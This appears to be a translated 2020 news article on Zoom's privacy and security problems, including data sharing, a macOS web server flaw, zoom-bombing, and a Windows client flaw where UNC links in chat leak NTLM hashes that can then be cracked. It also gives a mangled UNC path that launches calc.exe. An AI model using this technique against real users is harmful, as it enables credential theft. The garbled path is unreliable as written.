Earlier this week, the Zoom video conferencing application was already at the center of the scandal, as it transmitted data from its users to Facebook. Then the developers reported that an error had occurred, they did not know about such functions of the Facebook SDK and hastily refused to use it (which, however, did not save the company from at least one class action lawsuit).
Now the popularity of Zoom is growing rapidly in connection with the COVID-19 pandemic, as more and more people find themselves in isolation and are forced to work and communicate exclusively remotely. The company's shares against this background also show rapid growth.
In recent weeks, Zoom has been criticized by many IT publications. For example, Vice Motherboard recently studied video conferencing solutions on the market and found that Zoom video calls do not have end-to-end encryption by default, and the application offers creepy features like attention tracking. Using this function, you can track the attention of the participants in the conversation, and detect when a person has been distracted from the active Zoom window for more than half a minute.
“Zoom is an advertising business in its worst form: one that lives off of the collected personal data. Even more creepy is the fact that Zoom can collect a large amount of data, some of which are very personal (for example, a psychologist’s conversation with a patient), the specialist wrote. – Zoom does not have to participate in the advertising business, especially in the part that lives like a vampire due to the blood of human data. If Zoom needs more money, you need to charge more for your services or give less for free. ”
EFF experts also warned that Zoom hosts can monitor user activity during screen sharing, and administrators can view “how, when and where users use Zoom,” as well as access the contents of recorded calls, including “video, audio, decryption and chat files. "
However, the claims are not limited to user privacy.
For example, Zoom already remembered last year's vulnerability. Then, when installing on macOS, the application raised a local web server with an undocumented API on the user's machine, which remained in the system even after the application itself was uninstalled and remained active. As a result, any site that the user posted could interact with the mentioned web server. This made it possible to make video calls, connect to other people's calls, and even secretly update or reinstall the application itself (without any confirmation from the victim). Also, the web server could be used for DoS attacks, for which there were enough simple pings.
Now edition Bleeping Computer warnedthat the Zoom client for Windows can merge user credentials through UNC links.
So, when using Zoom, conference participants can send text messages to each other via the chat interface. Any addresses transmitted in this way are converted to hyperlinks so that other participants can click on them and open them in the browser by default.
The problem is that a researcher known as g0dmode, found that the Zoom Windows client converts UNC paths to links.
The publication explains that if a user clicks on the UNC link from the example above, Windows will try to connect to the remote site using the SMB protocol to open the remote cat.jpg file. In doing so, Windows will by default pass the username and its NTLM hashes, which can then be cracked using tools such as Hashcat.
In addition, it is noted that UNC injections can be used to run any programs on the local computer. For example, 127.0.0.1 C $ windows system32 calc.exe leads to the launch of the calculator.
Researchers have already notified Zoom developers of the problem and explain that UNC paths should not be converted to links. But the problem has not yet been fixed, therefore, in the Bleeping Computer material, you can find detailed instructions for minimizing risks (so that NTLM credentials are not transferred to remote servers).
Although this problem may not seem so significant, it is worth remembering that Zoom now occupies about 20% of the market and is under the scrutiny of scammers and intruders of all stripes. For example, experts at Check Point warnthat since the beginning of 2020, more than 1700 new domains related to Zoom were registered, and 25% of them were registered last week. About 4% of these domains are considered by experts to be extremely suspicious.
Also this week about the dangers of Zoom users warned and the FBI. The fact is that third parties are increasingly joining Zoom video conferences (online lessons and business meetings) in order to disrupt the meeting or joke, and then share the prank record on social networks. For example, in a remote classroom at a school in Massachusetts, an unidentified person joined the meeting and showed tattoos with a swastika on the camera. In another case, unknown persons interrupted the lesson, insulting the teacher.
The phenomenon has already received the name Zoom-Bombing and is becoming increasingly widespread. Zoom users are strongly advised not to share meeting identifiers (PMIs) and shared links, set passwords for all meetings, use waiting rooms, and update the application on time.